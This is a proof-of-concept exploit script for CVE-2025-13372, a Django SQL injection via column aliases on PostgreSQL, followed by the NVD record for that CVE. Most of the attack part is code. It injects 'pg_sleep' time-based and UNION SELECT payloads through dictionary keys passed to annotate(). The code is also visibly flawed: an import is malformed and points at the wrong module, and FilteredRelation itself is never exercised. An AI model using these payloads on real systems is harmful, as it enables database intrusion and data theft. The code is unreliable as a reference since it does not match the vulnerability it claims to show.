CVE-2025-13372

# CVE-2025-13372 Django FilteredRelation SQL Injection PoC # Target: Django <= 5.2.8, <= 5.1.14, <= 4.2.26 with PostgreSQL backend import os import django from django.conf import settings # Configure Django settings if not settings.configured: settings.configure( DEBUG=True, DATABASES={ 'default': { 'ENGINE': 'django.db.backends.postgresql', 'NAME': 'test_db', 'USER': 'db_user', 'PASSWORD': 'db_pass', 'HOST': 'localhost', 'PORT': '5432', } }, INSTALLED_APPS=[ 'django.contrib.contenttypes', 'django.contrib.auth', ], USE_TZ=True, ) django.setup() from django.contrib.auth.models import User from django.db.models import Count, Q from django.db.models.expressions importFilteredRelation def exploit_sql_injection(): """ Demonstrate SQL injection via FilteredRelation column aliases This PoC shows how malicious dictionary keys can inject SQL """ # Malicious key designed to inject SQL in column alias # The backslash and quotes can break out of the alias context malicious_key = 'status"; SELECT pg_sleep(5);--' # Normal usage would be: # User.objects.annotate(active_count=Count('id')).values('active_count') # Vulnerable code - passing dict with malicious keys as **kwargs try: # This will generate SQL like: # SELECT "status\"; SELECT pg_sleep(5);--" ... # which can cause SQL injection result = User.objects.annotate(**{malicious_key: Count('id')}) # Try to trigger query execution list(result) except Exception as e: print(f"Error occurred: {e}") print("SQL injection may have been attempted") def safer_exploit_example(): """ More realistic exploitation scenario Extract data using UNION-based injection in alias """ # Simulated attack payload for information disclosure info_disclosure_payload = 'col UNION SELECT secret FROM django_site--' # In vulnerable versions, this could be used to: # 1. Extract sensitive data via error-based or blind injection # 2. Execute time-based queries for blind injection # 3. Potentially modify data if combined with other vulnerabilities print(f"Payload: {info_disclosure_payload}") print("In vulnerable Django versions, this could lead to:") print("1. Unauthorized data access") print("2. Database information disclosure") print("3. Potential data manipulation") if __name__ == '__main__': print("CVE-2025-13372 Django SQL Injection PoC") print("=" * 50) exploit_sql_injection() safer_exploit_example()

{"cve": {"id": "CVE-2025-13372", "sourceIdentifier": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "published": "2025-12-02T16:15:53.907", "lastModified": "2025-12-12T12:57:23.833", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in 5.2 before 5.2.9, 5.1 before 5.1.15, and 4.2 before 4.2.27.\n`FilteredRelation` is subject to SQL injection in column aliases, using a suitably crafted dictionary, with dictionary expansion, as the `**kwargs` passed to `QuerySet.annotate()` or `QuerySet.alias()` on PostgreSQL.\nEarlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected.\nDjango would like to thank Stackered for reporting this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2", "versionEndExcluding": "4.2.27", "matchCriteriaId": "5208B938-135B-4682-9340-C15B7329ABA6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.1", "versionEndExcluding": "5.1.15", "matchCriteriaId": "37B0F07E-F8EA-4DFF-8ED9-C60A79A9ED24"}, {"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2", "versionEndExcluding": "5.2.9", "matchCriteriaId": "C523418D-ACB5-4E97-9D05-6879B0F48344"}]}]}], "references": [{"url": "https://docs.djangoproject.com/en/dev/releases/security/", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://groups.google.com/g/django-announce", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Mailing List", "Release Notes"]}, {"url": "https://www.djangoproject.com/weblog/2025/dec/02/security-releases/", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Patch", "Vendor Advisory"]}]}}